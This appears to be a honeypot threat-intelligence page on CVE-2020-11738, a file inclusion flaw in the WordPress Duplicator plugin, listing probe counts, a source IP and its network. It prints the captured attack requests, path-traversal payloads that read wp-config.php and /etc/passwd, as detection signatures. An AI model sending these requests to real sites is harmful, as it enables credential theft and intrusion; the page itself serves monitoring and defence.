CVE-2020-11738: WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion

HoneyLabs honeypots recorded 2 probes matching CVE-2020-11738 from 1 distinct source IP addresses in the last 7 days. Severity is rated high.

This CVE is on CISA's Known Exploited Vulnerabilities list.

Request paths that identify it

  • /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php
  • /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2142Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited21

Captured requests

  • /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  • /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php

CVE report

CVE report

Open a specific CVE from the CVE tracker.